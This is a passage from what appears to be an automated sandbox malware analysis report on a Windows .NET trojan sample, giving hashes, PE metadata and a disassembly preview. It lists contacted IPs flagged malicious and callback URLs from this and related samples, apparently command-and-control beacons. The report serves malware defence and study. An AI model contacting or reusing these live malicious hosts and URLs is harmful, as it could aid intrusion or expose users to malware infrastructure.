                                          http://www.carterandcone.comRNQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.%s.comPAexplorer.exe, 00000005.00000000.702532502.0000000002B50000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		low
                                          http://www.sandoll.co.kr.krNQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fonts.comexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.sandoll.co.krNQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.zhongyicts.com.cnNQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.carterandcone.como.NQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.sakkal.comexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://fontfabrik.compNQBNpLezqZKv1P4.exe, 00000000.00000003.639552016.000000000555D000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.sajatypeworks.comlNQBNpLezqZKv1P4.exe, 00000000.00000003.639209828.0000000005542000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.goodfont.co.krylxNQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.fontbureau.comexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.carterandcone.comTCNQBNpLezqZKv1P4.exe, 00000000.00000003.641810889.0000000005525000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.tiro.comicwfNQBNpLezqZKv1P4.exe, 00000000.00000003.641852644.0000000005525000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://050005.voodoo.com/js/partner.jsNETSTAT.EXE, 0000000A.00000002.903760107.0000000003AC2000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.carterandcone.comlexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.founder.com.cn/cn/NQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.founder.com.cn/cnNQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers/frere-user.htmlNQBNpLezqZKv1P4.exe, 00000000.00000003.645535031.000000000555E000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                                      		high
                                                      https://www.updates-app.com/4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96NETSTAT.EXE, 0000000A.00000002.903760107.0000000003AC2000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://fontfabrik.com(NQBNpLezqZKv1P4.exe, 00000000.00000003.639552016.000000000555D000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		low
                                                        http://www.sandoll.co.kr8lNQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown

                                                        Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        156.241.53.248
                                                        		www.sh-zzjy.comSeychelles
                                                        		136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                                                        46.137.146.55
                                                        		round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.comIreland
                                                        		16509AMAZON-02UStrue
                                                        104.143.9.211
                                                        		www.nirvananaturalcbd.netUnited States
                                                        		64200VIVIDHOSTINGUStrue
                                                        184.168.131.241
                                                        		iafzal.comUnited States
                                                        		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                        156.241.53.21
                                                        		www.boicity.comSeychelles
                                                        		136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                                                        199.34.228.66
                                                        		www.zrcezzfdfkyjlir.comUnited States
                                                        		27647WEEBLYUStrue

                                                        General Information

                                                        Joe Sandbox Version:33.0.0 White Diamond
                                                        Analysis ID:452473
                                                        Start date:22.07.2021
                                                        Start time:13:13:10
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 10m 10s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Sample file name:NQBNpLezqZKv1P4.exe
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                        Number of analysed new started processes analysed:17
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal100.troj.evad.winEXE@7/1@7/6
                                                        EGA Information:Failed
                                                        HDC Information:
                                                        • Successful, ratio: 24.1% (good quality ratio 21%)
                                                        • Quality average: 71.5%
                                                        • Quality standard deviation: 33.4%
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 54
                                                        • Number of non-executed functions: 132
                                                        Cookbook Comments:
                                                        • Adjust boot time
                                                        • Enable AMSI
                                                        • Found application associated with file extension: .exe
                                                        Warnings:
                                                        Show All
                                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                        • Excluded IPs from analysis (whitelisted): 52.147.198.201, 13.64.90.137, 168.61.161.212, 20.50.102.62, 205.185.216.42, 205.185.216.10, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.82.209.183
                                                        • Excluded domains from analysis (whitelisted): skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        13:14:20API Interceptor1x Sleep call for process: NQBNpLezqZKv1P4.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        104.143.9.211Y-20211907-00927735_pdf.exeGet hashmaliciousBrowse
                                                        • www.daniellageorges.com/uisg/?tF=ML04lb7xhZYx&5j3p=hhyAeZMb3zFiy4MOM2D3s3kjgT3RuE2EuTgtPMYOyuC8t4VCBdMXjazi2AHJSH/wEcpc
                                                        184.168.131.241G1638.exeGet hashmaliciousBrowse
                                                        • www.thedogmodel.com/hc3i/?JL0HnD=AEOrJsL6rGbsWfDwAgFkWYaihDHts4wGc065KMTZKhXMq5F1yQ8yw1LMQOwMcJswMbru&6l=y6ApP06pAPPL0p7
                                                        Statement.xlsxGet hashmaliciousBrowse
                                                        • www.abbiescottdesigns.com/bsk9/?8paTU=pzuDZXAXFv2D4hw0&6l=MopRYPOW7JCjWP/1sAzbtOEx8U1HhEs2pWXoV4jagQPZKmP7AX4vdyuGLvxuJwa4zZDBpg==
                                                        Payment Instruction.xlsxGet hashmaliciousBrowse
                                                        • www.cannibus-rx.com/gno4/?8p0p4zn=iEPMrV7ILrMnOAVARXhTlFvTv9GbImgTdlMtasoPFVRj/42YGlg1E2zruwKsUVio7YNnfQ==&CxlPa=y2JdyRFP5Fh8i
                                                        F63V4i8eZU.exeGet hashmaliciousBrowse
                                                        • www.mikecdmusic.com/nff/?D48p=A3r1GoCxq8luIa6nCE3Ske6N+BTFMgq1N1qJ/FMsH45BCQO39yS3uoKBERul6QoZrrZt&-ZgX=tR-DSFa8o
                                                        BANGKOK REG. SHIPMENT SUPPLY CIF BANGKOK 19-21 FULL DETAILS.exeGet hashmaliciousBrowse
                                                        • www.matkomiljevic.com/b6a4/?Qtx=qCsvzbIaH/CGU0c4Z7vgoGZzfGvizrvtlcJvThT2ItnQlVQYApGwkKJ+zmDyJqz7K2FB&p0GxMv=5jlLiBdP
                                                        order no. YOIMM20190832 pdf.exeGet hashmaliciousBrowse
                                                        • www.strongerpayment.com/h388/?v81=pAstdHxZGWGfHmw1JPDLR+rRdT5Wd2dd0JVjSbi5Tem+ckTFR6mVjiPsXOruuAOIXiwt&s0Ghw=0vlTNP3x_f
                                                        PROFORMA_INVOICE.xlsxGet hashmaliciousBrowse
                                                        • www.satyamsofficial.com/u6bi/?-Z60D0=4hO8rhRxxF4p2bmp&mrW4nr=6/DqqmU67My+o9WIEnQfg15rK68cX3oaURqPZnVLBGXmjCQ8oq4NJd8cVZ2k3j3bm4OM+Q==
                                                        order PI specification N0-00128835%%.exeGet hashmaliciousBrowse
                                                        • www.ghouliani.com/h388/?x48D=bTq2osQPDvHdAPhVpCoSdi9rtLGs2KFahtYfViOOdi/nUy4auo+J+f3F4G5+lTaJ5vsR31D3UQ==&q8m0=MFQh2ZPPwjVHEde
                                                        fb6YVPzIC1.exeGet hashmaliciousBrowse
                                                        • www.kat420nip.com/qmf6/?zd6tZ2=NbNxnFF0fFs88R&bFNp=Zv+eBnpAIFGmTI7p2xr5psf0Vi2YzEWTqeM4kLgFN5W9UQQQa9qsRCWDzA2mJxnFi8Tg
                                                        23BOqgo2Gn.exeGet hashmaliciousBrowse
                                                        • www.blackgirlvanlife.com/7bun/?z48HDp=PlKLWJz0Fllx3pm0&7nFtij=/gN6jVYNMVFDRayqbXkiyfbKJO5JP7TEqi3HPVa1wPvVanYFdjfGyUWlCJ9ff8Kj9D5R
                                                        d6qU4nYIEp.exeGet hashmaliciousBrowse
                                                        • www.wthcoffee.com/dy8g/?Rlr=YtpudndwADuOlBifVFtGWXR4JyGy/IbN+CEsYhZgxxhckievLjWlo+wT/5l3C1gHGS7g&s2JL=Q4SxKzxPg
                                                        PO_8356.pdf.exeGet hashmaliciousBrowse
                                                        • www.briankingfineart.com/ogpo/?7n0lq=dTcfCdwaIiENiusBFYeK5Px0FWRhWt92Mm3lebP8PLXeB8uAjBgQKXEu5MW9c1eHOvJwaxV/uw==&hnQLA0=d2MtV2hhcv98DBGP
                                                        Tlz3P6ra10.exeGet hashmaliciousBrowse
                                                        • www.thriveglucose.com/p2io/?xXk8kx=Bxltd27xbtZdOP20&B6eTzpeH=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9YiKWazZWK0rEbsmGg==
                                                        20hy7F77ShZV221.exeGet hashmaliciousBrowse
                                                        • www.empireofglam.com/cogt/?Z8qDI=rlXPMgteeH67sIOLSF2dCGYbsCcrTcMeWUUTRojqCE8KkK44PwA7ZHnM4ZUcfGmoJZOW&lR-Hn=6lxhenMPDFl4V
                                                        vwffPcT2NE.exeGet hashmaliciousBrowse
                                                        • www.onetinyproject.com/7bun/?9riP=HJHSmVjVEQRXj5S0ipANZWzmM/Hlu23aV6iReq3JvMFZniLQ3bv2HSoq7OV+krl58FR8&kL3Xu=t484X2jh6NJxjj-P
                                                        order spacification pdf.exeGet hashmaliciousBrowse
                                                        • www.strongerpayment.com/h388/?v468Mla=pAstdHxZGWGfHmw1JPDLR+rRdT5Wd2dd0JVjSbi5Tem+ckTFR6mVjiPsXOruuAOIXiwt&-Zr8=V44l1R
                                                        2GuNlCn0X6.exeGet hashmaliciousBrowse
                                                        • www.courtierkabyle.com/ushb/?PjND=Mlr4_4Sx&5j5=Mfaic7BYnuLfA3S1MkBhLcdZBOBWvpPcjePd2T0gGUCe/vHcO4ozxAM2oqSDUjuPRpVV
                                                        6660020210712_0-00010.XLS.exeGet hashmaliciousBrowse
                                                        • www.fostermarketing.energy/wz6a/?nluDS=LrYt&m6ApL=2XZNGGQYktPAsUu/ahuVsaXaEwpRRmnS5lzzQZsl9IG3KGSpvXx68Anyc9UBwoWT17Wg
                                                        SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.23572.rtfGet hashmaliciousBrowse
                                                        • www.listingallauto.com/slpb/?uP=aTQlizohqDVPsbOP&d6Dd=2ZqqrDcZ1B7k5sPUy5cxgCcAt+ptgw4L+UdrKgV+KOSxr7wkLzW4BhqhwhJOrLeK3SNRFg==
                                                        C0TEsC936Q.exeGet hashmaliciousBrowse
                                                        • www.conectaragora.com/n84e/?rfgPc=p6i+kRTx6iVgorjxXMyecgcPSEfEpCNZNLMvo7qFW93Imy9WrDA1CQT3eoMLkfW3eO1IeBYl3w==&3f0x=IN981HP8SlixfBA

                                                        Domains

                                                        No context

                                                        ASN

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        XIAOZHIYUN1-AS-APICIDCNETWORKUSOrden de compra cotizacion.exeGet hashmaliciousBrowse
                                                        • 23.226.51.219
                                                        U1R7Ed7940Get hashmaliciousBrowse
                                                        • 156.255.211.9
                                                        leyw73RE9oGet hashmaliciousBrowse
                                                        • 23.235.167.110
                                                        Tlz3P6ra10.exeGet hashmaliciousBrowse
                                                        • 156.255.140.216
                                                        TdRlUtrbeS.exeGet hashmaliciousBrowse
                                                        • 154.207.35.108
                                                        Petrogel SOA - Jul21.xlsxGet hashmaliciousBrowse
                                                        • 154.207.35.108
                                                        71q14am5gY.exeGet hashmaliciousBrowse
                                                        • 154.207.35.108
                                                        PO#JFUB0002 FOR NEW ORDER.exeGet hashmaliciousBrowse
                                                        • 156.225.32.61
                                                        factura y factura de la v#U00eda a#U00e9rea.exeGet hashmaliciousBrowse
                                                        • 156.241.53.145
                                                        ZQGMiyaTir.exeGet hashmaliciousBrowse
                                                        • 156.241.53.161
                                                        RFQ-BCM 03122020.exeGet hashmaliciousBrowse
                                                        • 156.241.53.127
                                                        eHTLcWfhgv.exeGet hashmaliciousBrowse
                                                        • 156.241.53.161
                                                        Nuvoco_RFQ_21-06-2021.exeGet hashmaliciousBrowse
                                                        • 156.234.184.179
                                                        Gz98aWSGb5.exeGet hashmaliciousBrowse
                                                        • 156.241.53.223
                                                        Swift_Report.exeGet hashmaliciousBrowse
                                                        • 156.241.53.223
                                                        POWlzL.exeGet hashmaliciousBrowse
                                                        • 156.226.160.4
                                                        Purchase_Order.exeGet hashmaliciousBrowse
                                                        • 156.241.53.127
                                                        lTAPQJikGw.exeGet hashmaliciousBrowse
                                                        • 156.241.53.161
                                                        Letter 09JUN 2021.xlsxGet hashmaliciousBrowse
                                                        • 156.241.53.161
                                                        bank details.exeGet hashmaliciousBrowse
                                                        • 156.224.66.89
                                                        AMAZON-02USkkXJRT8vEl.exeGet hashmaliciousBrowse
                                                        • 52.217.42.228
                                                        kS2dqbsDwD.exeGet hashmaliciousBrowse
                                                        • 52.217.201.169
                                                        Nb2HQZZDIf.exeGet hashmaliciousBrowse
                                                        • 52.216.94.27
                                                        ovLjmo5UoEGet hashmaliciousBrowse
                                                        • 63.34.62.30
                                                        o3ZUDIEL1vGet hashmaliciousBrowse
                                                        • 18.151.13.78
                                                        D1dU3jQ1IIGet hashmaliciousBrowse
                                                        • 34.208.242.240
                                                        mal.exeGet hashmaliciousBrowse
                                                        • 52.58.78.16
                                                        vjsBNwolo9.jsGet hashmaliciousBrowse
                                                        • 76.223.26.96
                                                        r3xwkKS58W.exeGet hashmaliciousBrowse
                                                        • 52.217.135.113
                                                        A7X93JRxhpGet hashmaliciousBrowse
                                                        • 54.151.74.14
                                                        1Ds9g7CEspGet hashmaliciousBrowse
                                                        • 13.208.189.104
                                                        XuQRPW44hiGet hashmaliciousBrowse
                                                        • 54.228.23.118
                                                        Taf5zLti30Get hashmaliciousBrowse
                                                        • 44.231.84.110
                                                        5qpsqg7U0GGet hashmaliciousBrowse
                                                        • 34.219.219.82
                                                        LyxN1ckWTWGet hashmaliciousBrowse
                                                        • 18.139.244.68
                                                        ZlvFNj.dllGet hashmaliciousBrowse
                                                        • 3.16.22.120
                                                        U4r9W64doyGet hashmaliciousBrowse
                                                        • 13.245.89.196
                                                        C4PozjQdGEGet hashmaliciousBrowse
                                                        • 18.135.214.121
                                                        kb5IbEJU8cGet hashmaliciousBrowse
                                                        • 18.227.43.189
                                                        MD5OxTSc6iGet hashmaliciousBrowse
                                                        • 18.149.163.217

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NQBNpLezqZKv1P4.exe.log
                                                        Process:C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1314
                                                        Entropy (8bit):5.350128552078965
                                                        Encrypted:false
                                                        SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                        MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                        SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                        SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                        SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):7.569459149457171
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Windows Screen Saver (13104/52) 0.07%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        File name:NQBNpLezqZKv1P4.exe
                                                        File size:714240
                                                        MD5:f03bf8d3ecc2ae4b40f836c59ac09bdf
                                                        SHA1:58f48a5a960eac4ee1f33ea16075cfd44f37b3a3
                                                        SHA256:2e4cf88a434d484057fcc090cb7de5deb6d30c8e00da339c886f2482f6a7ebe1
                                                        SHA512:9d174091b1bfb2e38da7cfb521bd5c6e471edb348e8e1c5cddd3b0784be6cd167617277c099d28927f97a24ee6a4e74d62e659dea23264d3c4ec738e6cee0255
                                                        SSDEEP:12288:4G0UB38XcvIFwXbrQtx0ChxIWzZc8o5UJAfEsyaUVKnp:4G0E8XcQWbVuSt5TfEzahp
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P.............>.... ........@.. .......................@............@................................

                                                        File Icon

                                                        Icon Hash:00828e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x4af93e
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                        Time Stamp:0x60F8BCE0 [Thu Jul 22 00:33:36 2021 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:v4.0.30319
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        int3
                                                        jnc 00007F8DE88E1D8Dh
                                                        test al, EAh
                                                        pushfd
                                                        inc esi
                                                        add eax, 35C2CDF9h
                                                        adc ebp, dword ptr [edi+0Fh]
                                                        stc
                                                        int C2h
                                                        xor eax, 0F6F132Eh
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xaf8ec0x4f.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x618.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xb20000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000xad95c0xada00False0.776407262419data7.57888986763IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rsrc0xb00000x6180x800False0.3349609375data3.48372701638IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0xb20000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        RT_VERSION0xb00900x386data
